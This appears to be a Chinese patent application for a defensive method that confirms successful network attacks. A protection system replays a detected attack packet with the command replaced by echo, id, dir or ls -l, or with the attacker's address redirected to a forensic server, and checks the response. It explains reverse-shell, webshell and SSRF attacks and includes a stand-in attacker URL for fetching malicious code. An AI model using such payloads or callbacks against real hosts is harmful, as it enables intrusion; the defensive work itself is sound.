第一方面,提供了一种攻击成功识别方法,该方法包括:对数据流进行攻击检测;若在所述数据流中检测到第一攻击事件,基于所述数据流中触发所述第一攻击事件的攻击报文,生成测试报文;向受攻击主机发送所述测试报文,所述受攻击主机为所述攻击报文的目的方;
若检测到所述测试报文关联的特定事件,确定所述第一攻击事件为攻击成功事件。
以上提供了一种基于主动交互来进行攻击成功识别的方法。以防护系统执行为例,防护系统通过在检测到攻击事件后,主动向受攻击主机发送一个测试报文,根据是否发生测试报文相关的特定事件,来判定检测到的攻击事件是否为攻击成功事件。由于该方法无需依赖于攻击报文中的攻击命令,也就无需依赖于攻击报文的响应报文来检测攻击是否成功,因此能够适用于攻击命令没有回显或者攻击命令的结果难以预期的情况,适用场景更加丰富,有助于从海量攻击告警中更有效地识别出执行成功的攻击事件。
可选地,所述基于所述数据流中触发所述第一攻击事件的攻击报文,生成测试报文,包括:对所述攻击报文进行修改,将修改后的攻击报文作为所述测试报文。
可选地,所述对所述攻击报文进行修改,包括:将所述攻击报文包含的攻击命令替换为设定命令。所述设定命令用于触发命令执行方回应所述设定命令的执行结果。
通过上述实现方式,由于将攻击命令替换为有固定回显的命令,因此与受攻击主机主动交互后,能够基于回显匹配的方式准确判定是否攻击成功,解决了单流基于响应内容识别攻击成功的方案中如果没有回显则难以判定、如果回显难以预期则难以判定、攻击者容易通过编码绕过的问题。
可选地,所述特定事件包括所述受攻击主机发送的执行结果与所述设定命令的预期结果相同,所述检测到所述测试报文关联的特定事件,包括:接收所述受攻击主机发送的针对所述测试报文的响应报文;从所述响应报文中解析获得所述响应报文中携带的所述受攻击主机对所述设定命令的执行结果;确定所述响应报文中携带的执行结果与所述设定命令对应的预期结果相同。
可选地,所述设定命令是“echo预定字符串”,所述设定命令的预期结果为“预定字符串”。
可选地,所述设定命令是“id”,所述设定命令的预期结果为“uid=0(root)gid=0(root)groups=0(root)”。
可选地,所述特定事件包括所述受攻击主机发送的执行结果满足所述设定命令对应的正则表达式,所述检测到所述测试报文关联的特定事件,包括:接收所述受攻击主机发送的针对所述测试报文的响应报文;从所述响应报文中解析获得所述响应报文中携带的所述受攻击主机对所述设定命令的执行结果;确定所述响应报文中携带的执行结果满足所述设定命令对应的正则表达式。
可选地,所述设定命令是“dir”,所述设定命令对应的正则表达式为“’\d{4}/\d{2}/\d{2}\s{1,10}\d{2}:\d{2}\s{1,10}<DIR>’”。
可选地,所述设定命令是“ls–l”,所述设定命令对应的正则表达式为“[d\-][rwx\-]{9}”。
可选地,所述对所述攻击报文进行修改,包括:将所述攻击报文包含的地址信息替换为取证服务器对应的地址信息。
可选地,所述攻击报文包含的地址信息或者所述取证服务器对应的地址信息包括互联网协议(internet protocol,IP)地址、端口号、域名或者统一资源定位符(uniform resource locator,URL)中至少一项。
通过上述实现方式,由于将攻击报文中的地址信息替换为取证服务器的地址信息,因此在攻击成功的情况下,受攻击主机会访问防护系统中部署的取证服务器。因此,防护系统能够更加及时地感知到受攻击主机的行为,也就能够更加快速地进行攻击成功判定,避免了多流关联方式中依赖于受攻击主机与攻击者之间会话结束后,才能根据会话的流量进行检测而导致时间窗口长的问题,节省了时延,提高了性能效率。
可选地,所述特定事件包括在所述测试报文的发送时间点之后所述受攻击主机访问所述取证服务器,所述检测到所述测试报文关联的特定事件,包括:获取所述取证服务器在所述测试报文的发送时间点之后的被访问记录;若所述被访问记录中存在所述受攻击主机对应的记录,则确定所述在所述测试报文的发送时间点之后所述受攻击主机访问所述取证服务器。
通过上述实现方式,在更加快速有效地进行攻击成功判定的基础上,由于取证服务器维 护被访问记录,无需终端侧日志采集关联分析,可落地性强。
可选地,所述攻击报文用于指示所述受攻击主机创建或者修改指定文件,所述攻击报文包括所述指定文件的标识,所述基于所述数据流中触发所述第一攻击事件的攻击报文,生成测试报文,包括:基于所述攻击报文包含的所述指定文件的标识,生成所述测试报文,所述测试报文用于请求访问所述指定文件。
通过上述实现方式,由于防护系统代替攻击者主动访问受攻击主机上植入的文件,从而无需依赖于攻击者访问文件的时间,因此解决了多流关联方式依赖攻击者行为的问题。
可选地,所述特定事件包括发送所述测试报文之后的所述受攻击主机相关的数据流中所述指定文件关联的第二攻击事件。
通过上述实现方式,能够在攻击者通过向受攻击主机上已有文件写入恶意代码使其成为网页木马(webshell)文件的场景下,有效地判定是否攻击成功。
可选地,所述特定事件包括所述指定文件被成功访问,所述检测到所述测试报文关联的特定事件,包括:从所述测试报文之后的所述受攻击主机相关的数据流中获得所述受攻击主机发送的针对所述测试报文的响应报文;若所述响应报文中的超文本传输协议(Hypertext Transfer Protocol,HTTP)响应码是表示成功的响应码,确定所述指定文件被成功访问。
可选地,所述特定事件包括所述指定文件被成功访问,所述检测到所述测试报文关联的特定事件,包括:从所述测试报文之后的所述受攻击主机相关的数据流中获得所述受攻击主机发送的针对所述测试报文的响应报文;若所述响应报文的报文体中存在设定字符串,确定所述第一攻击事件为攻击成功事件,所述设定字符串表示所述指定文件被成功访问。
通过上述实现方式,能够在攻击者向受攻击主机上创建webshell文件的场景下,有效地判定是否攻击成功。
可选地,所述测试报文为HTTP请求报文。
可替代地,所述测试报文为文件传输协议(File Transfer Protocol,FTP)请求报文、域名系统(Domain Name System,DNS)请求报文、远程方法调用(Remote Method Invocation,RMI)请求报文、轻型目录访问协议(Lightweight Directory Access Protocol,LDAP)请求报文、网络文件系统(Network File System,NFS)请求报文、超文本传输安全协议(Hyper Text Transfer Protocol over Secure Socket Layer,HTTPS)请求报文、传输控制协议(transmission control protocol,TCP)请求报文或者用户数据报协议(User Datagram Protocol,UDP)报文。
第二方面,提供了一种攻击成功识别装置,该攻击成功识别装置具有实现上述第一方面或上述第一方面的任意一种可选方式所述方法的功能。所述功能可以通过硬件实现,也可以通过硬件执行相应的软件实现。所述硬件或软件包括一个或多个与上述功能相对应的单元。
第三方面,提供了一种防护系统,防护系统包括:处理器,所述处理器与存储器耦合,所述存储器中存储有至少一条计算机程序指令,所述至少一条计算机程序指令由所述处理器加载并执行,以使所述防护系统执行上述第一方面或第一方面任一种可选方式中的方法。
可选地,防护系统还包括网络接口,网络接口用于接收数据流以及发送所述测试报文。
可选地,防护系统为单台物理计算机。或者,防护系统包括多台物理计算机,防护系统中的存储器、网络接口和至少一个处理器分布在不同物理计算机上。例如,防护系统为集群 计算机。
第四方面,提供了一种计算机可读存储介质,该存储介质中存储有至少一条指令,该指令在计算机上运行时,使得计算机执行上述第一方面或第一方面任一种可选方式所提供的方法。
第五方面,提供了一种计算机程序产品,所述计算机程序产品包括一个或多个计算机程序指令,当所述计算机程序指令被计算机加载并运行时,使得所述计算机执行上述第一方面或第一方面任一种可选方式所提供的方法。
第六方面,提供了一种芯片,包括存储器和处理器,存储器用于存储计算机指令,处理器用于从存储器中调用并运行该计算机指令,以执行上述第一方面及其第一方面任意可能的实现方式中的方法。
图1是本申请实施例提供的一种典型应用场景的示意图;
图2是本申请实施例提供的一种攻击成功识别方法的流程图;
图3是本申请实施例提供的一种防护系统的工作流程的框架图;
图4是本申请实施例提供的一种防护系统的工作详细流程图;
图5是本实施例提供的一种主动交互后基于固定回显匹配判定攻击成功的方法流程图;
图6是本实施例提供的一种主动交互后根据对取证服务器的访问行为进行攻击成功判定的方法流程图;
图7是本实施例提供的一种主动访问创建或修改的文件进行攻击成功判定的方法流程图;
图8是本申请实施例提供的一种攻击成功识别装置800的结构示意图;
图9是本申请实施例提供的一种防护系统900的结构示意图。
为使本申请的目的、技术方案和优点更加清楚,下面将结合图对本申请实施方式作进一步地详细描述。
下面对本申请实施例涉及的一些术语概念做解释说明。
(1)数据流(flow或data stream)
数据流是指通信双方在一次会话中交互的一系列报文。数据流包括客户端向服务器发起的请求报文以及服务器针对请求报文发送的响应报文。以超文本传输协议(Hypertext Transfer Protocol,HTTP)的场景为例为例,在一个典型应用场景中,攻击者和受攻击主机建立连接后,攻击者向受攻击主机发送了一系列HTTP请求,受攻击主机针对这些HTTP请求向攻击者发送了一系列HTTP响应,防护系统进行攻击检测时使用的数据流包括攻击者发送的HTTP请求,也包括受攻击主机发送的HTTP响应。
(2)攻击载荷(攻击payload)
攻击载荷泛指任意用于发起网络攻击的数据。攻击载荷的携带位置可能是报文体,也可 能是报文头或者URL。攻击载荷包括而不限于攻击命令、恶意文件的统一资源定位符(Uniform Resource Locator,URL)、控制端的地址信息、局域网内指定资源的URL或者局域网中指定主机的地址信息中至少一项。
(3)攻击报文
攻击报文是指携带了攻击载荷的报文。攻击报文所基于的协议类型包括而不限于超文本传输协议(Hypertext Transfer Protocol,HTTP)、文件传输协议(File Transfer Protocol,FTP)、域名系统(Domain Name System,DNS)、远程方法调用(Remote Method Invocation,RMI)、轻型目录访问协议(Lightweight Directory Access Protocol,LDAP)、超文本传输安全协议(Hyper Text Transfer Protocol over Secure Socket Layer,HTTPS)、传输控制协议(transmission control protocol,TCP)、用户数据报协议(User Datagram Protocol,UDP)、网络文件系统(Network File System,NFS)等。
以HTTP的情况为例,攻击报文例如是一个HTTP请求报文。该HTTP请求报文的报文体中包含攻击命令,或者该HTTP请求报文的请求行包括恶意文件的URL,或者封装在HTTP报文头外层的IP头包括控制端的互联网协议(internet protocol,IP)地址。
(4)攻击命令
攻击命令泛指任意恶意用途的命令。例如,攻击命令用于指示主机运行恶意文件(如病毒或木马),或者用于指示主机将内网中敏感数据或机密数据(如用户信息、内网中设备的参数)输出至互联网中指定地址,或者用于指示主机在本地创建一个恶意文件,或者用于指示主机向本地已有的指定文件中写入恶意代码。
(5)回显
回显是指主机在执行命令后回应的命令的执行结果。例如,向主机输入回声(echo)命令:echo ognl_attack_test。主机执行这条echo命令后输出ognl_attack_test,在这个例子中,ognl_attack_test为echo命令的回显。
(6)网页木马(webshell)
webshell是一种类似于shell的、能够远程访问web服务器的脚本程序。webshell通常以文件的形式存在。shell俗称壳(用来区别于核),是指“为使用者提供操作界面”的软件(也称命令解析器,command interpreter)。webshell基于web浏览器与web服务器交互。webshell能够通过服务器上支持的任何编程语言进行编程实现。由于PHP在Web应用程序中的广泛使用,webshell通常是用PHP编程语言编写的,动态服务页面(Active Server Pages,ASP)、NET、Python、Perl、Ruby和Unix shell脚本也能够用来编写webshell。
webshell的作用主要分为两种。一方面,网站管理员常常使用webshell进行网站管理、服务器管理等等。另一方面,webshell经常被攻击者利用,达到控制网站服务器的目的,这种恶意用途的webshell也称为后门文件、后门程序、web脚本木马等。利用webshell攻击的基本原理是,攻击者使用网络监控工具,找到能通过webshell传递的漏洞,这些漏洞通常出现在运行在web服务器上的应用程序中。之后,攻击者能够使用webshell来发布shell命令,在web服务器上执行特权升级,以及在web服务器上上传、删除、下载和执行文件等。
(7)反弹shell(reverse shell)
反弹shell攻击的一种基本流程是,第一步,攻击者向受攻击主机发送攻击报文,攻击报文包含控制端的IP地址、控制端上指定的TCP或UDP端口的端口号。攻击报文指示受攻击 主机连接控制端上的指定端口。第二步,在攻击成功的情况下,受攻击主机接收到攻击报文后会主动发送一个连接请求。连接请求中的目的IP地址是攻击报文中携带的控制端的IP地址。连接请求中的目的端口号是攻击报文中携带的控制端的端口号。如此,受攻击主机与控制端上指定端口建立了连接。第三步,控制端利用与受攻击主机之间的连接,向受攻击主机发送恶意的指令。受攻击主机执行指令并将指令的执行结果通过连接返回给控制端。控制端是指攻击者控制的一个主机或者多台主机组成的集群。
总结以上流程可见,反弹shell攻击成功的基本特征在于,在第二步中,受攻击主机主动发送了一个请求报文,请求报文包含指定的地址信息,该地址信息来自于第一步中的攻击报文,该地址信息可选是IP地址和端口号,或者是域名和URL。
(8)外发请求攻击
外发请求中的“外”是指互联网。外发请求攻击的基本流程是,第一步,攻击者向受攻击主机发送攻击报文,攻击报文中的攻击payload包含互联网中指定主机的地址或者互联网中指定文件的URL,该指定主机通常是攻击者使用的主机或者控制端主机,该指定文件往往包含恶意代码。第二步,在攻击成功的情况下,受攻击主机会主动发起攻击报文所指定的主机或者文件的访问请求。比如,攻击报文中包含URL http://attacker_server/evil.xml,该URL往往对应于包含恶意代码的文件,在攻击成功的情况下,受攻击主机向外部地址http://attacker_server/evil.xml发起请求。
(9)服务器端请求伪造(Server-Side Request Forgery,SSRF)攻击
SSRF攻击的基本流程是,第一步,攻击者向受攻击主机发送攻击报文。攻击报文通常是攻击者伪造的获取受攻击主机上资源的请求,该请求的典型情况是包含类似于嵌套形式的URL,该URL的主机字段包括受攻击主机的域名或IP地址,而该URL的参数字段又包含局域网中指定主机上资源的URL。第二步,在攻击成功的情况下,受攻击主机收到攻击报文之后,会主动发送针对局域网中指定主机上资源的请求。
(10)echo命令
echo命令是linux中的一种输出命令。echo命令用于指示命令执行方输出预定字符串。
echo命令的基本格式为echo[预定字符串],即一个字符串“echo",后面再跟上一个指定执行方要回应的字符串。可选地,echo命令配合一些选项使用,则echo命令的格式替换为echo[选项][预定字符串]。
举例来说,一条echo命令为echo ognl_attack_test,这条echo命令的执行结果为ognl_attack_test。
(11)打印(print)命令
print命令是linux中的另一种输出命令。print命令的功能与echo命令基本上是等同的。
print命令的基本格式为print[预定字符串],即一个字符串“print",后面再跟上一个指定执行方要回应的字符串。举例来说,一条print命令为print test,这条print命令的执行结果为test。
此外,与echo命令基本等同的命令除了print命令之外,还有printf命令、fprintf命令、sprintf命令等等,在此不做一一列举。总结来看,这些命令的执行结果基本上都是命令本身携带的字符串,因此这些命令的执行结果是能够提前预期的。
(12)身份标识符(id)命令
id命令用于查询用户的信息,例如用户的用户ID(user ID,UID)、用户所归属的用户组(group)、组ID(group ID,GID)等。UID用于标识用户,GID用于标识用户所归属的用户组。换句话说,id命令会触发命令执行方回应用户的信息。
id命令的基本格式是id[参数][用户名]。如果id后面不带任何参数和任何用户名,默认查询当前操作用户的用户名、所归属的用户组、UID和GID。
id命令的执行结果包含uid=gid=groups=。
举例来说,一条id命令的执行结果为uid=0(root)gid=0(root)groups=0(root)。在本例中,用户名是root,UID是0,用户所属的用户组是root,用户组的GID是0。
以上描述的id命令的执行结果仅是示例性地,上述执行结果中的root可替换为其他自定义的用户名,比如admin、user等。上述执行结果中的0可替换为其他UID。本实施例对id命令的执行结果的具体形式和内容不做限定。
(13)ifconfig命令
ifconfig命令用于配置或者查看网络接口。ifconfig命令能够触发命令执行方回应网络接口的状态或者参数。ifconfig命令的执行结果包括flags、RUNNING、mtu、inet、ether和netmask等。其中,RUNNING表示网络接口处于运行状态,mtu表示最大传输单元,inet表示网口的网络地址,ethe表示Ethernet(以太网),netmask表示子网掩码。
(14)正则表达式(Regular Expression,简写为regex、regexp或RE)
正则表达式是一种用于描述、匹配一系列匹配某个句法规则的字符串。正则表达式的形式是一种介于斜杠之间或介于跟在%r后的任意分隔符之间的模式。
(15)dir命令
dir命令用于查看文件的信息。dir命令能够触发命令执行方回应指定目录下存在哪些文件或者文件的大小、创建时间等具体的文件信息。
dir命令的执行结果满足正则表达式’\d{4}/\d{2}/\d{2}\s{1,10}\d{2}:\d{2}\s{1,10}<DIR>’。/\d/用于匹配一个数字,等同于/[0-9]/,如d{4}表示匹配4个数字。/\s/用于匹配一个空白字符,等同于/[\t\r\n\f]/。<DIR>是dir命令的执行结果包含的固定字符串。
(16)ls–l命令
ls–l命令用于查看文件或目录的属性。ls–l命令能够触发命令执行方回应文件或目录的节点、种类、权限模式、链接数量、所归属的用户和用户组、最近访问或修改的时间等信息。
ls–l命令的执行结果满足正则表达式[d\-][rwx\-]{9}。d表示目录,rwx表示Linux的文件中的三种属性,r表示可读,w表示可写,x表示可执行。
(17)HTTP响应码
HTTP响应码也称HTTP状态码(HTTP status code),是用以表示网页服务器HTTP响应状态的3位数字代码。HTTP响应码被分为五类,响应码的第一个数字代表了响应的五种状态之一。五类HTTP响应码分别为1xx信息类(information)、2xx成功类(successful)、3xx重定向类(redirection)、4xx客户端错误类(client error)和5xx服务端错误类(server error)。
2xx成功类响应码代表请求已成功被服务器接收、理解、并接受。2xx成功类响应码包括200、201、202、203、204、205、206、207、208、226。典型的成功类响应码的含义如下。
200 OK表示请求已成功,请求所希望的响应头或数据体将随此响应返回。实际的响应将取决于所使用的请求方法。在GET请求中,响应将包含与请求的资源相对应的实体。在POST 请求中,响应将包含描述或操作结果的实体。
201 created表示请求已经被实现,而且有一个新的资源已经依据请求的需要而创建,且资源的URI已经随Location头信息返回。
202 accepted表示服务器已接受请求,但尚未处理。最终该请求可能会也可能不会被执行,并且可能在处理发生时被禁止。
203 Non-Authoritative Information表示服务器是一个转换代理服务器,例如网络加速器。
204 No Content表示服务器成功处理了请求,没有返回任何内容。
205 Reset Content表示服务器成功处理了请求,但没有返回任何内容。与204响应不同,此响应要求请求者重置文档视图。
206 Partial Content表示服务器已经成功处理了部分GET请求。
(18)网络安全防护系统(下文简称为防护系统)
防护系统是指用于保护一个网络区域免受来自另一个网络区域的网络攻击和网络入侵行为的计算机系统。防护系统可选地是一个计算机集群,或者是一个计算机。防护系统的具体产品形态包括而不限于防火墙(firewall)、安全网关、入侵检测系统(intrusion detection system,IDS)类设备、入侵防御系统(intrusion prevention system,IPS)类设备、统一威胁管理(unified threat management,UTM)设备、反病毒(anti-virus,AV)设备、抗分布式拒绝服务攻击(distributed denial-of-service attack,DDoS)(anti-DDoS)设备、下一代防火墙(Next generation firewall,NGFW)等等。
以防火墙为例描述,防火墙这一具体设备,通常用于两个网络之间的隔离。当然,这种隔离是高明的,隔离的是“火”的蔓延,而又保证“人”的穿墙而过。这里的“火”是指网络中的各种攻击,而“人”是指业务报文。因其隔离、防守的属性,防火墙灵活应用于网络边界、子网隔离等位置,具体如企业网络出口、大型网络内部子网隔离、数据中心边界等等。
防火墙与路由器、交换机是有区别的。路由器用来连接不同的网络,通过路由协议保证互联互通,确保将报文转发到目的地;交换机则通常用来组建局域网,作为局域网通信的重要枢纽,通过二层/三层交换快速转发报文;而防火墙主要部署在网络边界,对进出网络的访问行为进行控制。也即是,路由器与交换机的主要功能是转发,而防火墙的主要功能是安全防护。
下面对本申请实施例的网络部署场景举例说明。
图1是本申请实施例提供的一种网络部署场景的示意图。如图1所示,在企业网和互联网之间部署有防护系统10。
防护系统10用于对企业网和互联网之间的网络流量进行攻击检测,并利用本申请的技术方案进行攻击成功判定。防护系统10包括防火墙101、探针102或安全分析器103。
防火墙101通过直连方式部署于企业网络出口处,能够获取到部署位置的双向流量。可选地,当防火墙101检测到攻击事件时,进一步利用本申请的技术方案判断是否攻击成功。
安全分析器103通过旁路部署,能通过镜像的方式获取部署位置的双向流量。安全分析器103使用探针102在企业网络出口处采集网络流量数据。可选地,探针102进行攻击检测与攻击成功判定,或者探针102把采集的数据发送至安全分析器103,由安全分析器103进行攻击检测与攻击成功判定。
下面对本申请实施例的方法流程举例说明。
图2是本申请实施例提供的一种攻击成功识别方法的流程图。图2所示方法包括以下步骤S201至步骤S204。
图2所示方法所基于的网络部署场景可选地如上述图1所示。例如,结合图1来看,在由直连方式部署的防火墙101执行本申请的技术方案判断是否攻击成功的情况下,图2所示方法中的防护系统包括图1中的防火墙101。在由旁路部署的安全分析器103执行本申请的技术方案判断是否攻击成功的情况下,图2所示方法中的防护系统包括图1中的安全分析器103,可选地还包括防火墙101和探针102。
可选地,图2所示方法中的所有步骤由防护系统中同一个设备执行。比如,以下S201至S204均由安全分析器103执行或者均由防火墙101执行。可替代地,图2所示方法中不同步骤由防护系统中不同设备执行。例如,防火墙101执行S201,如果检测到攻击事件,防火墙101将攻击报文发给安全分析器103,安全分析器103基于攻击报文执行S202至S204。
图2所示方法的典型应用场景为检测互联网对局域网发起的一个攻击事件是否为攻击成功事件,以便防御攻击或者修复局域网的安全漏洞,进而保护局域网的网络安全。图2所示方法适用的具体场景包括而不限于反弹shell、外发请求攻击、webshell植入、SSRF攻击等。
图2一些可选实施例涉及多个攻击事件。为了区分不同的攻击事件,用“第一攻击事件”、“第二攻击事件”区分描述不同的攻击事件。
S201、防护系统对数据流进行攻击检测。
防护系统检测时针对的数据流包括以局域网中主机为目的方的报文,可选地还包括局域网中主机发送的报文。例如,结合图1来看,检测时使用的数据流是图1中企业网与互联网之间传输的数据流。
以HTTP的场景为例,防护系统检测的数据流为HTTP报文流,防护系统检测的数据流包括以局域网中主机为目的方的HTTP请求报文,可选地还包括局域网中主机发送的HTTP响应报文。HTTP的情况仅是举例说明,可替代地,防护系统检测的报文的类型从HTTP报文替换为FTP报文、DNS报文、RMI报文、LDAP报文、NFS报文、HTTPS报文、TCP报文、UDP报文等等,本实施例对防护系统进行检测时针对的报文的协议类型不做限定。
S202、若在数据流中检测到第一攻击事件,防护系统基于数据流中触发第一攻击事件的攻击报文,生成测试报文。
第一攻击事件包括而不限于各类WEB入侵事件,例如反序列化、命令注入等事件。
攻击报文是来自于攻击者或者控制端、以受攻击主机为目的方的报文。攻击报文中的源IP地址是攻击者或者控制端的IP地址。攻击报文的目的IP地址是受攻击主机的IP地址。攻击报文的目的端口号是受攻击主机上端口的端口号。可选地,参照图1,受攻击主机是企业网中的终端或服务器。
测试报文用于测试第一攻击事件是否为攻击成功事件。测试报文是来自于防护系统、以受攻击主机为目的方的报文。测试报文中的源IP地址为防护系统的IP地址。测试报文中的目的IP地址为受攻击主机的IP地址。测试报文中的目的端口号是受攻击主机上端口的端口号。示例性地,测试报文中的源IP地址字段是防护系统根据本端的IP地址填写的。测试报文中的目的IP地址与攻击报文中的目的IP地址保持一致,测试报文中的目的端口号与攻击 报文中的目的端口号保持一致。
测试报文所基于的协议类型包括很多种实现方式。例如,测试报文为HTTP请求报文。可替代地,测试报文替换为其他协议中的请求报文,例如FTP请求报文、DNS请求报文、RMI请求报文、LDAP请求报文、NFS请求报文、HTTPS请求报文、TCP请求报文、UDP请求报文等等,本实施例对测试报文所采用的协议类型不做限定。
可选地,测试报文所基于的协议类型和触发第一攻击事件的攻击报文所基于的协议类型相同。例如,上述攻击报文是HTTP请求报文,测试报文也是HTTP请求报文。
S203、防护系统向受攻击主机发送测试报文。
S204、若检测到测试报文关联的特定事件,防护系统确定第一攻击事件为攻击成功事件。
本实施例提供了一种基于主动交互来进行攻击成功识别的方法。以防护系统执行为例,防护系统通过在检测到攻击事件后,主动向受攻击主机发送一个测试报文,根据是否发生测试报文相关的特定事件,来判定检测到的攻击事件是否为攻击成功事件。由于该方法无需依赖于攻击报文中的攻击命令,也就无需依赖于攻击命令的结果是否能够预期,因此能够适用于攻击命令没有回显或者攻击命令的结果难以预期的情况,适用场景更加丰富,有助于从海量攻击告警中更有效地识别出执行成功的攻击事件。
同时,由于防护系统主动与受攻击主机进行交互,受攻击主机针对防护系统发来的测试报文进行回应时,自然会将响应报文发给防护系统,而不会发给攻击者。或者,在外发请求攻击、SSRF攻击、反弹shell等场景下,受攻击主机自然会访问测试报文中防护系统指定的设备(如取证服务器),而不会访问攻击者指定的设备。因此,防护系统能够更加及时地感知到受攻击主机的行为,也就能够更加快速地进行攻击成功判定,避免了多流关联方式中依赖于受攻击主机与攻击者之间会话结束后,才能根据会话的流量进行检测而导致时间窗口长的问题,节省了时延,提高了性能效率。
同时,由于防护系统代替攻击者主动访问受攻击主机,从而无需依赖于攻击者访问受攻击主机的时间,因此解决了多流关联方式依赖攻击者行为的问题。
以上描述了图2所示方法的基本流程,下面对图2所示方法中一些步骤可能采用的具体实现方式举例说明。
在上述S201中,防护系统具体如何进行攻击检测包括多种可能实现方式,下面结合实现方式A和实现方式B举例说明。
实现方式A、防护系统利用攻击检测模型对数据流进行攻击检测。
攻击检测模型是指采用机器学习的方式,根据恶意流量的样本和/或现网流量进行训练得到的模型。攻击检测模型用于检测数据流中是否存在攻击事件。攻击检测模型可选地由云端训练得到,并由云端下发给防护系统,或者攻击检测模型在防护系统本地训练得到。
在一种可能的实现中,防护系统上存储有攻击检测模型。防护系统从数据流中解析获得关键数据,防护系统将数据流的关键数据输入到攻击检测模型,根据攻击检测模型的输出结果确定数据流中是否存在攻击事件。
上述数据流的关键数据包括而不限于数据流的应用层载荷中的一些关键词、数据流中一些关键词的信息熵、流量中携带的cookie、数据流携带的时间戳、数据流中的referer参数等等。
实现方式B、防护系统利用特征库对数据流进行攻击检测。
特征库也称签名库。特征库包括多种攻击特征,该多种攻击特征由网络安全解决方案提供商从大量已知恶意流量或恶意文件提取得到。
在一种可能的实现中,防护系统从数据流中解析获得关键数据,防护系统判断数据流的关键数据是否包含特征库中的攻击特征,如果数据流中的关键数据包含特征库中的攻击特征,则确定数据流中存在攻击事件。
在上述S202中,防护系统如何生成测试报文包括多种具体实现方式,下面结合实现方式1和实现方式2举例说明。
实现方式1、防护系统对攻击报文进行修改,将修改后的攻击报文作为测试报文。
可选地,防护系统针对攻击报文中的攻击载荷进行修改,将包含修改后的攻击载荷的报文作为测试报文。防护系统具体修改攻击载荷中的哪些内容包括多种方式,下面结合实现方式1-1和实现方式1-2举例说明。
实现方式1-1、防护系统将攻击报文包含的攻击命令替换为设定命令。
设定命令用于触发命令执行方回应设定命令的执行结果。可选地,上述设定命令预置在防护系统中。
防护系统在替换攻击命令时具体采用哪些设定命令包括多种实现方式,下面结合实现方式1-1-1、实现方式1-1-2和实现方式1-1-3举例说明。
实现方式1-1-1、设定命令是有固定回显内容的命令。
有固定回显内容的命令是指命令执行后主机返回的执行结果是固定不变的。例如,命令执行后主机返回的执行结果是命令本身携带的字符串。
可选地,防护系统采用的有固定回显内容的命令(即上述设定命令)是echo命令。例如,echo命令为“echo预定字符串”,这条echo命令的回显内容是预定字符串。
可替代地,防护系统采用的有固定回显内容的命令(即上述设定命令)是print命令、printf命令、fprintf命令或者sprintf命令等等。例如,设定命令是print命令,比如说是“print test”,这条命令的回显内容是test。
实现方式1-1-2、设定命令是回显内容不固定,但回显格式固定的命令。
回显格式固定的命令是指命令执行后主机返回的执行结果的格式是固定不变的。例如,命令执行后主机返回的执行结果包含指定字符串。该指定字符串例如是命令的语法规范中要求执行方返回的字符串,又如是设备的一些参数的名称。
可选地,防护系统采用的回显格式固定的命令(即上述设定命令)是id命令,id命令的执行结果固定包含“uid=”、“gid=”和“groups=”这三个字符串。可替代地,防护系统采用的回显格式固定的命令(即上述设定命令)是ifconfig命令,ifconfig命令的执行结果固定包含“flags”、“RUNNING”、“mtu”、“inet”、“ether”和“netmask”这些字符串。
实现方式1-1-3、设定命令是回显的内容和格式都不固定,但回显满足预定的正则表达式的命令。
例如,防护系统采用的回显满足正则表达式的命令(即上述设定命令)是dir命令或者ls–l命令。
实现方式1-2、防护系统将攻击报文包含的地址信息替换为取证服务器对应的地址信息。
取证服务器是指防护系统中部署的、用于对受攻击主机的访问行为进行取证的设备。可选地,取证服务器和防护系统中其他设备分设,取证服务器是一台独立的设备。可替代地,取证服务器和防护系统中其他设备合设。例如,结合图1来看,取证服务器设于图1中安全分析器103、探针102或者防火墙101内。
攻击报文包含的地址信息例如是攻击者或者控制端的地址信息。攻击报文包含的地址信息包括IP地址、端口号、域名或者URL中至少一项。
可选地,测试报文中取证服务器对应的地址信息包括取证服务器的IP地址、取证服务器的端口号、取证服务器的域名或者取证服务器保存的资源的URL中至少一项。
例如,攻击报文包含控制端的IP地址和控制端的端口号,防护系统将攻击报文中控制端的IP地址替换为取证服务器的IP地址,并将攻击报文中控制端的端口号替换为取证服务器上开放端口的端口号。
例如,攻击报文包含恶意文件的URL,防护系统将攻击报文中恶意文件的URL替换为取证服务器上保存的HTTP资源的URL。
例如,攻击报文包含攻击者的域名,防护系统将攻击报文中攻击者的域名替换为取证服务器的域名。
以上实现方式1-1至实现方式1-2描述了防护系统在攻击报文中可能修改的两种内容。可选地,防护系统还修改攻击报文中的源IP地址,将攻击报文中的源IP地址替换为防护系统的IP地址,以使受攻击主机基于替换后的源IP地址将响应报文发送给防护系统,而非发送给攻击者或者控制端。
实现方式2、防护系统基于攻击报文包含的指定文件的标识,生成测试报文。
指定文件是指攻击者利用攻击报文在受攻击主机上植入的恶意文件。攻击报文包括指定文件的标识。指定文件的标识例如是指定文件的文件名。可选地,攻击报文还包含指定文件的URL以及指定文件的内容。指定文件的产生方式包括多种情况,下面结合情况一和情况二举例说明。
情况一、攻击报文指示受攻击主机创建指定文件。
例如,攻击报文指示受攻击主机创建一个webshell文件。
在攻击成功的情况下,受攻击主机响应于攻击报文,在受攻击主机本地创建并保存攻击报文所指示的文件,从而产生指定文件。
情况二、攻击报文指示受攻击主机对本地的指定文件进行修改。
例如,受攻击主机预先保存了指定文件,攻击报文指示受攻击主机向受攻击主机上保存的指定文件中写入恶意代码。在攻击成功的情况下,受攻击主机响应于攻击报文,向指定文件写入恶意代码,使得受攻击主机上指定文件变成了恶意文件。
在采用上述实现方式2的情况下,防护系统生成的测试报文用于请求访问指定文件。测试报文包含指定文件的标识和/或指定文件的URL。在一种可能的实现中,生成测试报文的具体实现方式包括:防护系统从检测到上述第一攻击事件的数据流中解析获得URL,并从攻击载荷中获得文件名;防护系统对获得的URL以及文件名进行组合,得到指定文件的URL;防护系统构造包含指定文件的URL的HTTP请求报文,作为测试报文。
在上述S204中,防护系统如何检测特定事件或者说如何进行攻击成功判定包括多种具体 实现方式,下面结合实现方式a至实现方式d举例说明。
实现方式a、防护系统基于回显匹配的方式判定是否攻击成功。
示例性地,防护系统向受攻击主机发送测试报文后,受攻击主机针对测试报文生成响应报文,向防护系统发送响应报文。防护系统接收响应报文;防护系统从响应报文中解析获得响应报文中携带的受攻击主机对设定命令的执行结果。防护系统根据响应报文中携带的执行结果,判断第一攻击事件是否为攻击成功事件。
实现方式a具体包含下述实现方式a-1至实现方式a-2。在采用实现方式a-1的情况下,上文描述的特定事件包括受攻击主机发送的执行结果与设定命令的预期结果相同。在采用实现方式a-2的情况下,上文描述的特定事件包括受攻击主机发送的执行结果满足设定命令对应的正则表达式。
